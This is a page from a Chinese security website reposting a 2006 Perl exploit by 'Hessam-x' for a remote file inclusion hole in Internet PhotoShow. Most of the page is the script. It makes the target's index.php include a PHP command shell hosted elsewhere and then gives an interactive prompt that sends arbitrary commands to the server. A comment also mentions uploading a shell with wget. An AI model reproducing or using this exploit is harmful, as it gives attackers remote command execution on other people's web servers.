首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet PhotoShow (page) Remote File Inclusion Exploit
来源:www.hackerz.ir 作者:hackerz 发布时间:2006-04-19  

#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# sub usage()
# {
#print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n";
#print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
#exit();
#}
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
# DeltaHAcking Team #
# website: www.deltahacking.com #
######################################################
# Internet PhotoShow Remote File Inclusion Exploit #
######################################################
# upload a shell with this xpl:
# wget http://shell location/
use LWP::UserAgent;
print "-------------------------------------------\n";
print "= Internet PhotoShow =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";


$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}

while()
{
print "Hessam-x@PhotoShow \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)
{print "\n[-] Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n[-] Invalid Command\n"}

if($return =~ /(.*)/)


{
$freturn = $1;
$freturn=~ tr/[ê]/[\n]/;
print "\r\n$freturn\n\r";
last;
}

else {print "Hessam-x@PhotoShow \$";}}}last;


sub usage()
{
print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
exit();
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Neon Responder 5.4 (Clock Sync
·PHP Net Tools <= 2.7.1 Remo
·FlexBB <= 0.5.5 (/inc/start
·ASPSitem <= 1.83 (Haberler.
·Blackorpheus ClanMemberSkript
·Mambo <= 4.5.3 , Joomla <
·Microsoft IIS ASP Stack Overfl
·PCPIN Chat <= 5.0.4 (login/
·Cheese Tracker <= 0.9.9 Loc
·PHPSurveyor <= 0.995 (surve
·D-Link Router UPNP Stack Overf
·My Gaming Ladder Combo System
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved